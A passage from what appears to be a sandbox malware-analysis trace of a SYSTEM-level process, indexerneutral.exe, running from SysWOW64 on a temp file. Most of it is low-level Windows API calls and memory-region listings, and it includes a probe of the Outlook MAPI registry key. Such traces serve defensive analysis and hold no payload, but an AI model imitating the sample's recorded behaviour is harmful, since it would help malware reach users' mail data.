dd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x3b\xb7\xdd\x87\xec\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0251.227] GetLastError () returned 0x7f [0251.227] SetLastError (dwErrCode=0x7f) [0251.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fdb0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0251.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fdb0, cbMultiByte=256, lpWideCharStr=0x19f708, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ똦@Ā") returned 256 [0251.227] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ똦@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0251.227] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ똦@Ā", cchSrc=256, lpDestStr=0x19f4f8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0251.227] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x19fbb0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x3b\xb7\xdd\x87\xec\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0251.227] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x419b50, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\indexerneutral.exe" (normalized: "c:\\windows\\syswow64\\indexerneutral.exe")) returned 0x26 [0251.227] GetLastError () returned 0x0 [0251.227] SetLastError (dwErrCode=0x0) [0251.227] GetLastError () returned 0x0 [0251.227] SetLastError (dwErrCode=0x0) [0251.227] GetLastError () returned 0x0 [0251.227] SetLastError (dwErrCode=0x0) [0251.227] GetLastError () returned 0x0 [0251.227] SetLastError (dwErrCode=0x0) [0251.227] GetLastError () returned 0x0 [0251.227] SetLastError (dwErrCode=0x0) [0251.227] GetLastError () returned 0x0 [0251.228] SetLastError (dwErrCode=0x0) [0251.228] GetLastError () returned 0x0 [0251.228] SetLastError (dwErrCode=0x0) [0251.228] GetLastError () returned 0x0 [0251.228] SetLastError (dwErrCode=0x0) [0251.228] GetLastError () returned 0x0 [0251.228] SetLastError (dwErrCode=0x0) [0251.228] GetLastError () returned 0x0 [0251.228] SetLastError (dwErrCode=0x0) [0251.228] GetLastError () returned 0x0 [0251.228] SetLastError (dwErrCode=0x0) [0251.228] GetLastError () returned 0x0 [0251.228] SetLastError (dwErrCode=0x0) [0251.228] GetLastError () returned 0x0 [0251.228] SetLastError (dwErrCode=0x0) [0251.228] GetLastError () returned 0x0 [0251.228] SetLastError (dwErrCode=0x0) [0251.228] GetLastError () returned 0x0 [0251.228] SetLastError (dwErrCode=0x0) [0251.228] GetLastError () returned 0x0 [0251.228] SetLastError (dwErrCode=0x0) [0251.228] GetLastError () returned 0x0 [0251.228] SetLastError (dwErrCode=0x0) [0251.228] GetLastError () returned 0x0 [0251.228] SetLastError (dwErrCode=0x0) [0251.228] GetLastError () returned 0x0 [0251.228] SetLastError (dwErrCode=0x0) [0251.228] GetLastError () returned 0x0 [0251.228] SetLastError (dwErrCode=0x0) [0251.228] GetLastError () returned 0x0 [0251.228] SetLastError (dwErrCode=0x0) [0251.228] GetLastError () returned 0x0 [0251.228] SetLastError (dwErrCode=0x0) [0251.228] GetLastError () returned 0x0 [0251.229] SetLastError (dwErrCode=0x0) [0251.229] GetLastError () returned 0x0 [0251.229] SetLastError (dwErrCode=0x0) [0251.229] GetLastError () returned 0x0 [0251.229] SetLastError (dwErrCode=0x0) [0251.229] GetLastError () returned 0x0 [0251.229] SetLastError (dwErrCode=0x0) [0251.229] GetLastError () returned 0x0 [0251.229] SetLastError (dwErrCode=0x0) [0251.229] GetLastError () returned 0x0 [0251.229] SetLastError (dwErrCode=0x0) [0251.229] GetLastError () returned 0x0 [0251.229] SetLastError (dwErrCode=0x0) [0251.229] GetLastError () returned 0x0 [0251.229] SetLastError (dwErrCode=0x0) [0251.229] GetLastError () returned 0x0 [0251.229] SetLastError (dwErrCode=0x0) [0251.229] GetLastError () returned 0x0 [0251.229] SetLastError (dwErrCode=0x0) [0251.229] GetLastError () returned 0x0 [0251.229] SetLastError (dwErrCode=0x0) [0251.229] GetLastError () returned 0x0 [0251.229] SetLastError (dwErrCode=0x0) [0251.229] GetLastError () returned 0x0 [0251.229] SetLastError (dwErrCode=0x0) [0251.229] GetLastError () returned 0x0 [0251.229] SetLastError (dwErrCode=0x0) [0251.229] GetLastError () returned 0x0 [0251.229] SetLastError (dwErrCode=0x0) [0251.229] GetLastError () returned 0x0 [0251.229] SetLastError (dwErrCode=0x0) [0251.229] GetLastError () returned 0x0 [0251.230] SetLastError (dwErrCode=0x0) [0251.230] GetLastError () returned 0x0 [0251.230] SetLastError (dwErrCode=0x0) [0251.230] GetLastError () returned 0x0 [0251.230] SetLastError (dwErrCode=0x0) [0251.230] GetLastError () returned 0x0 [0251.230] SetLastError (dwErrCode=0x0) [0251.230] GetLastError () returned 0x0 [0251.230] SetLastError (dwErrCode=0x0) [0251.230] GetLastError () returned 0x0 [0251.230] SetLastError (dwErrCode=0x0) [0251.230] GetLastError () returned 0x0 [0251.230] SetLastError (dwErrCode=0x0) [0251.230] GetLastError () returned 0x0 [0251.230] SetLastError (dwErrCode=0x0) [0251.230] GetLastError () returned 0x0 [0251.230] SetLastError (dwErrCode=0x0) [0251.230] GetLastError () returned 0x0 [0251.230] SetLastError (dwErrCode=0x0) [0251.230] GetLastError () returned 0x0 [0251.230] SetLastError (dwErrCode=0x0) [0251.230] GetLastError () returned 0x0 [0251.230] SetLastError (dwErrCode=0x0) [0251.230] GetLastError () returned 0x0 [0251.230] SetLastError (dwErrCode=0x0) [0251.230] GetLastError () returned 0x0 [0251.230] SetLastError (dwErrCode=0x0) [0251.230] GetLastError () returned 0x0 [0251.230] SetLastError (dwErrCode=0x0) [0251.230] GetLastError () returned 0x0 [0251.230] SetLastError (dwErrCode=0x0) [0251.230] GetLastError () returned 0x0 [0251.230] SetLastError (dwErrCode=0x0) [0251.230] GetLastError () returned 0x0 [0251.231] SetLastError (dwErrCode=0x0) [0251.231] GetLastError () returned 0x0 [0251.231] SetLastError (dwErrCode=0x0) [0251.231] GetLastError () returned 0x0 [0251.231] SetLastError (dwErrCode=0x0) [0251.231] GetLastError () returned 0x0 [0251.231] SetLastError (dwErrCode=0x0) [0251.231] GetLastError () returned 0x0 [0251.231] SetLastError (dwErrCode=0x0) [0251.231] GetLastError () returned 0x0 [0251.231] SetLastError (dwErrCode=0x0) [0251.231] GetLastError () returned 0x0 [0251.231] SetLastError (dwErrCode=0x0) [0251.231] GetLastError () returned 0x0 [0251.231] SetLastError (dwErrCode=0x0) [0251.231] GetLastError () returned 0x0 [0251.231] SetLastError (dwErrCode=0x0) [0251.231] GetLastError () returned 0x0 [0251.231] SetLastError (dwErrCode=0x0) [0251.231] GetLastError () returned 0x0 [0251.231] SetLastError (dwErrCode=0x0) [0251.231] GetLastError () returned 0x0 [0251.231] SetLastError (dwErrCode=0x0) [0251.231] GetLastError () returned 0x0 [0251.231] SetLastError (dwErrCode=0x0) [0251.231] GetLastError () returned 0x0 [0251.231] SetLastError (dwErrCode=0x0) [0251.231] GetLastError () returned 0x0 [0251.231] SetLastError (dwErrCode=0x0) [0251.231] GetLastError () returned 0x0 [0251.231] SetLastError (dwErrCode=0x0) [0251.231] GetLastError () returned 0x0 [0251.231] SetLastError (dwErrCode=0x0) [0251.231] GetLastError () returned 0x0 [0251.231] SetLastError (dwErrCode=0x0) [0251.231] GetLastError () returned 0x0 [0251.231] SetLastError (dwErrCode=0x0) [0251.231] GetLastError () returned 0x0 [0251.231] SetLastError (dwErrCode=0x0) [0251.231] GetLastError () returned 0x0 [0251.231] SetLastError (dwErrCode=0x0) [0251.231] GetLastError () returned 0x0 [0251.231] SetLastError (dwErrCode=0x0) [0251.232] GetLastError () returned 0x0 [0251.232] SetLastError (dwErrCode=0x0) [0251.232] GetLastError () returned 0x0 [0251.232] SetLastError (dwErrCode=0x0) [0251.232] GetLastError () returned 0x0 [0251.232] SetLastError (dwErrCode=0x0) [0251.232] GetLastError () returned 0x0 [0251.232] SetLastError (dwErrCode=0x0) [0251.232] GetLastError () returned 0x0 [0251.232] SetLastError (dwErrCode=0x0) [0251.232] GetLastError () returned 0x0 [0251.232] SetLastError (dwErrCode=0x0) [0251.232] GetLastError () returned 0x0 [0251.232] SetLastError (dwErrCode=0x0) [0251.232] GetLastError () returned 0x0 [0251.232] SetLastError (dwErrCode=0x0) [0251.232] GetLastError () returned 0x0 [0251.232] SetLastError (dwErrCode=0x0) [0251.232] GetLastError () returned 0x0 [0251.232] SetLastError (dwErrCode=0x0) [0251.232] GetLastError () returned 0x0 [0251.232] SetLastError (dwErrCode=0x0) [0251.232] GetLastError () returned 0x0 [0251.232] SetLastError (dwErrCode=0x0) [0251.232] GetLastError () returned 0x0 [0251.232] SetLastError (dwErrCode=0x0) [0251.232] GetLastError () returned 0x0 [0251.232] SetLastError (dwErrCode=0x0) [0251.232] GetLastError () returned 0x0 [0251.232] SetLastError (dwErrCode=0x0) [0251.232] GetLastError () returned 0x0 [0251.232] SetLastError (dwErrCode=0x0) [0251.232] GetLastError () returned 0x0 [0251.232] SetLastError (dwErrCode=0x0) [0251.232] GetLastError () returned 0x0 [0251.232] SetLastError (dwErrCode=0x0) [0251.232] GetLastError () returned 0x0 [0251.232] SetLastError (dwErrCode=0x0) [0251.232] GetLastError () returned 0x0 [0251.232] SetLastError (dwErrCode=0x0) [0251.232] GetLastError () returned 0x0 [0251.232] SetLastError (dwErrCode=0x0) [0251.232] GetLastError () returned 0x0 [0251.232] SetLastError (dwErrCode=0x0) [0251.232] GetLastError () returned 0x0 [0251.233] SetLastError (dwErrCode=0x0) [0251.233] GetLastError () returned 0x0 [0251.233] SetLastError (dwErrCode=0x0) [0251.233] GetLastError () returned 0x0 [0251.233] SetLastError (dwErrCode=0x0) [0251.233] GetLastError () returned 0x0 [0251.233] SetLastError (dwErrCode=0x0) [0251.233] GetLastError () returned 0x0 [0251.233] SetLastError (dwErrCode=0x0) [0251.233] GetLastError () returned 0x0 [0251.233] SetLastError (dwErrCode=0x0) [0251.233] GetLastError () returned 0x0 [0251.233] SetLastError (dwErrCode=0x0) [0251.233] GetLastError () returned 0x0 [0251.233] SetLastError (dwErrCode=0x0) [0251.233] GetLastError () returned 0x0 [0251.233] SetLastError (dwErrCode=0x0) [0251.233] GetLastError () returned 0x0 [0251.233] SetLastError (dwErrCode=0x0) [0251.233] GetLastError () returned 0x0 [0251.233] SetLastError (dwErrCode=0x0) [0251.233] GetLastError () returned 0x0 [0251.233] SetLastError (dwErrCode=0x0) [0251.233] GetLastError () returned 0x0 [0251.233] SetLastError (dwErrCode=0x0) [0251.233] GetLastError () returned 0x0 [0251.233] SetLastError (dwErrCode=0x0) [0251.233] GetLastError () returned 0x0 [0251.233] SetLastError (dwErrCode=0x0) [0251.233] GetLastError () returned 0x0 [0251.233] SetLastError (dwErrCode=0x0) [0251.233] GetLastError () returned 0x0 [0251.233] SetLastError (dwErrCode=0x0) [0251.233] GetLastError () returned 0x0 [0251.233] SetLastError (dwErrCode=0x0) [0251.233] GetLastError () returned 0x0 [0251.233] SetLastError (dwErrCode=0x0) [0251.233] GetLastError () returned 0x0 [0251.233] SetLastError (dwErrCode=0x0) [0251.233] GetLastError () returned 0x0 [0251.233] SetLastError (dwErrCode=0x0) [0251.235] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0251.235] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x407002) returned 0x0 [0251.235] GetLastError () returned 0x0 [0251.235] SetLastError (dwErrCode=0x0) [0251.235] GetLastError () returned 0x0 [0251.235] SetLastError (dwErrCode=0x0) [0251.235] GetLastError () returned 0x0 [0251.235] SetLastError (dwErrCode=0x0) [0251.235] GetLastError () returned 0x0 [0251.235] SetLastError (dwErrCode=0x0) [0251.235] GetLastError () returned 0x0 [0251.235] SetLastError (dwErrCode=0x0) [0251.235] GetLastError () returned 0x0 [0251.235] SetLastError (dwErrCode=0x0) [0251.235] GetLastError () returned 0x0 [0251.235] SetLastError (dwErrCode=0x0) [0251.235] GetLastError () returned 0x0 [0251.235] SetLastError (dwErrCode=0x0) [0251.235] GetLastError () returned 0x0 [0251.235] SetLastError (dwErrCode=0x0) [0251.235] GetLastError () returned 0x0 [0251.235] SetLastError (dwErrCode=0x0) [0251.235] GetLastError () returned 0x0 [0251.235] SetLastError (dwErrCode=0x0) [0251.235] GetLastError () returned 0x0 [0251.236] SetLastError (dwErrCode=0x0) [0251.236] GetLastError () returned 0x0 [0251.236] SetLastError (dwErrCode=0x0) [0251.236] GetLastError () returned 0x0 [0251.236] SetLastError (dwErrCode=0x0) [0251.236] GetLastError () returned 0x0 [0251.236] SetLastError (dwErrCode=0x0) [0251.236] GetLastError () returned 0x0 [0251.236] SetLastError (dwErrCode=0x0) [0251.236] GetLastError () returned 0x0 [0251.236] SetLastError (dwErrCode=0x0) [0251.236] GetLastError () returned 0x0 [0251.236] SetLastError (dwErrCode=0x0) [0251.236] GetLastError () returned 0x0 [0251.236] SetLastError (dwErrCode=0x0) [0251.236] GetLastError () returned 0x0 [0251.236] SetLastError (dwErrCode=0x0) [0251.236] GetLastError () returned 0x0 [0251.236] SetLastError (dwErrCode=0x0) [0251.236] GetLastError () returned 0x0 [0251.236] SetLastError (dwErrCode=0x0) [0251.236] GetLastError () returned 0x0 [0251.236] SetLastError (dwErrCode=0x0) [0251.236] GetLastError () returned 0x0 [0251.236] SetLastError (dwErrCode=0x0) [0251.236] GetLastError () returned 0x0 [0251.236] SetLastError (dwErrCode=0x0) [0251.236] GetLastError () returned 0x0 [0251.236] SetLastError (dwErrCode=0x0) [0251.236] GetLastError () returned 0x0 [0251.236] SetLastError (dwErrCode=0x0) [0251.236] GetLastError () returned 0x0 [0251.236] SetLastError (dwErrCode=0x0) [0251.236] GetLastError () returned 0x0 [0251.236] SetLastError (dwErrCode=0x0) [0251.236] GetLastError () returned 0x0 [0251.236] SetLastError (dwErrCode=0x0) [0251.236] GetLastError () returned 0x0 [0251.236] SetLastError (dwErrCode=0x0) [0251.236] GetLastError () returned 0x0 [0251.236] SetLastError (dwErrCode=0x0) [0251.236] GetLastError () returned 0x0 [0251.236] SetLastError (dwErrCode=0x0) [0251.236] GetLastError () returned 0x0 [0251.236] SetLastError (dwErrCode=0x0) [0251.237] GetLastError () returned 0x0 [0251.237] SetLastError (dwErrCode=0x0) [0251.237] GetLastError () returned 0x0 [0251.237] SetLastError (dwErrCode=0x0) [0251.237] GetLastError () returned 0x0 [0251.237] SetLastError (dwErrCode=0x0) [0251.237] GetLastError () returned 0x0 [0251.237] SetLastError (dwErrCode=0x0) [0251.237] GetLastError () returned 0x0 [0251.237] SetLastError (dwErrCode=0x0) [0251.237] GetLastError () returned 0x0 [0251.237] SetLastError (dwErrCode=0x0) [0251.237] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x760f0000 [0251.238] LoadLibraryW (lpLibFileName="ole32.dll") returned 0x75b50000 [0251.241] LoadLibraryW (lpLibFileName="api-ms-win-core-com-l1-1-0.DLL") returned 0x75ca0000 [0251.241] GetCommandLineW () returned="\"C:\\Windows\\SysWOW64\\indexerneutral.exe\" \"C:\\Windows\\TEMP\\3595.tmp\"" [0251.241] CommandLineToArgvW (in: lpCmdLine="\"C:\\Windows\\SysWOW64\\indexerneutral.exe\" \"C:\\Windows\\TEMP\\3595.tmp\"", pNumArgs=0x19ff30 | out: pNumArgs=0x19ff30) returned 0x5586c8*="C:\\Windows\\SysWOW64\\indexerneutral.exe" [0251.242] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Clients\\Mail\\Microsoft Outlook", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x1, lpSecurityAttributes=0x0, phkResult=0x19fd18, lpdwDisposition=0x0 | out: phkResult=0x19fd18*=0x14c, lpdwDisposition=0x0) returned 0x0 [0251.242] RegQueryValueExW (in: hKey=0x14c, lpValueName="DLLPathEx", lpReserved=0x0, lpType=0x0, lpData=0x19fd28, lpcbData=0x19fd14*=0x104 | out: lpType=0x0, lpData=0x19fd28*=0x43, lpcbData=0x19fd14*=0xc2) returned 0x0 [0251.242] RegCloseKey (hKey=0x14c) returned 0x0 [0251.242] LoadLibraryW (lpLibFileName="C:\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\system\\msmapi\\1033\\msmapi32.dll") returned 0x0 [0251.344] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x19fed4 | out: phModule=0x19fed4) returned 0 [0251.345] ExitProcess (uExitCode=0x0) Thread: id = 525 os_tid = 0x488 Process: id = "30" image_name = "indexerneutrala.exe" filename = "c:\\windows\\syswow64\\indexerneutrala.exe" page_root = "0x1f2cc000" os_pid = "0x4ec" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x6cc" cmd_line = "\"C:\\Windows\\SysWOW64\\indexerneutrala.exe\" \"C:\\Windows\\TEMP\\3595.tmp\"" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 4176 start_va = 0x7f907000 end_va = 0x7f907fff entry_point = 0x0 region_type = private name = "private_0x000000007f907000" filename = "" Region: id = 4177 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4178 start_va = 0xb1fd870000 end_va = 0xb1fd88ffff entry_point = 0x0 region_type = private name = "private_0x000000b1fd870000" filename = "" Region: id = 4179 start_va = 0xb1fd890000 end_va = 0xb1fd8a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b1fd890000" filename = "" Region: id = 4180 start_va = 0xb1fd8b0000 end_va = 0xb1fd92ffff entry_point = 0x0 region_type = private name = "private_0x000000b1fd8b0000" filename = "" Region: id = 4181 start_va = 0xb1fd930000 end_va = 0xb1fd933fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b1fd930000" filename = "" Region: id = 4182 start_va = 0xb1fd940000 end_va = 0xb1fd940fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b1fd940000" filename = "" Region: id = 4183 start_va = 0xb1fd950000 end_va = 0xb1fd951fff entry_point = 0x0 region_type = private name = "private_0x000000b1fd950000" filename = "" Region: id = 4184 start_va = 0x7df5ff090000 end_va = 0x7ff5ff08ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff090000" filename = "" Region: id = 4185 start_va = 0x7ff66fbd0000 end_va = 0x7ff66fbf2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff66fbd0000" filename = "" Region: id = 4186 start_va = 0x7ff66fbfd000 end_va = 0x7ff66fbfefff entry_point = 0x0 region_type = private name = "private_0x00007ff66fbfd000" filename = "" Region: id = 4187 start_va = 0x7ff66fbff000 end_va = 0x7ff66fbfffff entry_point = 0x0 region_type = private name = "private_0x00007ff66fbff000" filename = "" Region: id = 4188 start_va = 0x7ff670370000 end_va = 0x7ff67038bfff entry_point = 0x7ff670370000 region_type = mapped_file name = "indexerneutrala.exe" filename = "\\Windows\\SysWOW64\\indexerneutrala.exe" (normalized: "c:\\windows\\syswow64\\indexerneutrala.exe") Region: id = 4189 start_va = 0x7fff9f1c0000 end_va = 0x7fff9f381fff entry_point = 0x7fff9f1c0000 